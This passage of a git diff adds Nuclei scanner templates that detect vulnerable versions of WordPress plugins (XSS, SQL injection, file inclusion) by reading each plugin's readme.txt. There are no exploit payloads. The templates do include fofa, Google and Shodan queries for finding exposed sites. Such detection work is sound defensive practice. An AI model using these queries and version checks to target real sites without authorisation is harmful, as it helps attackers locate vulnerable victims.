+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ec069ef-7b53-47b5-93bc-92cfc2d62c88?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-53759
+ metadata:
+ fofa-query: "wp-content/plugins/arca-payment-gateway/"
+ google-query: inurl:"/wp-content/plugins/arca-payment-gateway/"
+ shodan-query: 'vuln:CVE-2024-53759'
+ tags: cve,wordpress,wp-plugin,arca-payment-gateway,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arca-payment-gateway/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arca-payment-gateway"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml b/poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
new file mode 100644
index 0000000000..a82e876f3e
--- /dev/null
+++ b/poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0
+
+info:
+ name: >
+ Cowidgets – Elementor Addons <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Cowidgets – Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a29ebdcb-3b03-4504-b553-6f7633c68f3f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53786
+ metadata:
+ fofa-query: "wp-content/plugins/cowidgets-elementor-addons/"
+ google-query: inurl:"/wp-content/plugins/cowidgets-elementor-addons/"
+ shodan-query: 'vuln:CVE-2024-53786'
+ tags: cve,wordpress,wp-plugin,cowidgets-elementor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cowidgets-elementor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cowidgets-elementor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml b/poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
new file mode 100644
index 0000000000..a93a6d8a8b
--- /dev/null
+++ b/poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dac404d-369c-4036-9c64-4afab021cbe8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-53790
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-53790'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml b/poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml
new file mode 100644
index 0000000000..f349b13ac1
--- /dev/null
+++ b/poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml
@@ -0,0 +1,59 @@
+id: best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b
+
+info:
+ name: >
+ Best Addons for Elementor <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/559165ed-f7f6-4f5a-ad37-8a2d53924888?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/best-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/best-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,best-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/best-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "best-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.5')
\ No newline at end of file
diff --git a/poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml b/poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml
new file mode 100644
index 0000000000..2fe6816d17
--- /dev/null
+++ b/poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml
@@ -0,0 +1,59 @@
+id: bin-stripe-donation-26be16d9007bef8defcdb810970efcf9
+
+info:
+ name: >
+ Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4335e598-d48b-4dbe-b6a4-69790acecfdd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bin-stripe-donation/"
+ google-query: inurl:"/wp-content/plugins/bin-stripe-donation/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bin-stripe-donation,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bin-stripe-donation"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml b/poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
new file mode 100644
index 0000000000..7f0398197f
--- /dev/null
+++ b/poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
@@ -0,0 +1,59 @@
+id: capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db
+
+info:
+ name: >
+ Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/capitalize-my-title/"
+ google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,capitalize-my-title,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "capitalize-my-title"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.3')
\ No newline at end of file
diff --git a/poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml b/poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml
new file mode 100644
index 0000000000..6aed97655a
--- /dev/null
+++ b/poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml
@@ -0,0 +1,59 @@
+id: chatter-50f846e0f4847e28db594b1f3b22c537
+
+info:
+ name: >
+ Chatter <= 1.0.1 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2c6349-9444-4cea-90ae-f396ae92f85a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/chatter/"
+ google-query: inurl:"/wp-content/plugins/chatter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,chatter,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/chatter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "chatter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml b/poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml
new file mode 100644
index 0000000000..efb0110edc
--- /dev/null
+++ b/poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml
@@ -0,0 +1,59 @@
+id: content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3
+
+info:
+ name: >
+ Content Audit Exporter <= 1.1 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6f8837-813c-4e16-9adb-fdc90ccaf0ca?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/content-audit-exporter/"
+ google-query: inurl:"/wp-content/plugins/content-audit-exporter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,content-audit-exporter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/content-audit-exporter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "content-audit-exporter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml b/poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml
new file mode 100644
index 0000000000..2ccb59d5b0
--- /dev/null
+++ b/poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml
@@ -0,0 +1,59 @@
+id: countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07
+
+info:
+ name: >
+ Countdown Timer for Elementor <= 1.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e2d35599-2402-4837-97a3-707cd33d439a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/countdown-timer-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/countdown-timer-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,countdown-timer-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/countdown-timer-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "countdown-timer-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
diff --git a/poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml b/poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml
new file mode 100644
index 0000000000..7a6904a0bd
--- /dev/null
+++ b/poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml
@@ -0,0 +1,59 @@
+id: cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f
+
+info:
+ name: >
+ CultBooking Hotel Booking Engine <= 2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/79844b53-5527-42e2-8363-db0eb73d1f6c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cultbooking-booking-engine/"
+ google-query: inurl:"/wp-content/plugins/cultbooking-booking-engine/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cultbooking-booking-engine,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cultbooking-booking-engine/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cultbooking-booking-engine"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml b/poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
new file mode 100644
index 0000000000..d97cca740d
--- /dev/null
+++ b/poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
@@ -0,0 +1,59 @@
+id: mycred-b69b74183494c4b8dbaaa94b47c77a89
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
diff --git a/poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml b/poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml
new file mode 100644
index 0000000000..bcf2dfd748
--- /dev/null
+++ b/poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml
@@ -0,0 +1,59 @@
+id: out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65
+
+info:
+ name: >
+ Out Of Stock Badge <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b80802cd-6fcc-4cdb-b6d7-a9171cadcc83?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/out-of-stock-badge/"
+ google-query: inurl:"/wp-content/plugins/out-of-stock-badge/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,out-of-stock-badge,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/out-of-stock-badge/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "out-of-stock-badge"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml b/poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml
new file mode 100644
index 0000000000..d5272ac577
--- /dev/null
+++ b/poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml
@@ -0,0 +1,59 @@
+id: paypal-responder-2bb28c0dbe7d31806c826438ecefef2f
+
+info:
+ name: >
+ PayPal Responder <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6b43a4f-ef44-46cf-89ce-5747ac5f47cd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/paypal-responder/"
+ google-query: inurl:"/wp-content/plugins/paypal-responder/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,paypal-responder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/paypal-responder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "paypal-responder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2')
\ No newline at end of file
diff --git a/poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml b/poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml
new file mode 100644
index 0000000000..60e3239a82
--- /dev/null
+++ b/poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml
@@ -0,0 +1,59 @@
+id: plugin-5dcfaa6624128695b8dbff266dad887f
+
+info:
+ name: >
+ eDoc Easy Tables <= 1.29 - Cross-Site Request Forgery to SQL Injection
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd9d7d34-c03d-4791-94b4-9d2f502a7e37?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.29')
\ No newline at end of file
diff --git a/poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml b/poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml
new file mode 100644
index 0000000000..0fb3ace178
--- /dev/null
+++ b/poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml
@@ -0,0 +1,59 @@
+id: verowa-connect-e19e41c4fd554c823dba2f39d46b632a
+
+info:
+ name: >
+ Verowa Connect <= 3.0.1 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/verowa-connect/"
+ google-query: inurl:"/wp-content/plugins/verowa-connect/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,verowa-connect,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/verowa-connect/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "verowa-connect"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.1')
\ No newline at end of file
diff --git a/poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml b/poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml
new file mode 100644
index 0000000000..3961057743
--- /dev/null
+++ b/poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml
@@ -0,0 +1,59 @@
+id: vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9
+
+info:
+ name: >
+ Vertical Carousel <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ae463ae-5bfb-4e7c-9f84-edaa9a826ffa?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/vertical-carousel-slider/"
+ google-query: inurl:"/wp-content/plugins/vertical-carousel-slider/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,vertical-carousel-slider,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/vertical-carousel-slider/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "vertical-carousel-slider"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml b/poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
new file mode 100644
index 0000000000..1776c246f3
--- /dev/null
+++ b/poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
@@ -0,0 +1,59 @@
+id: wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
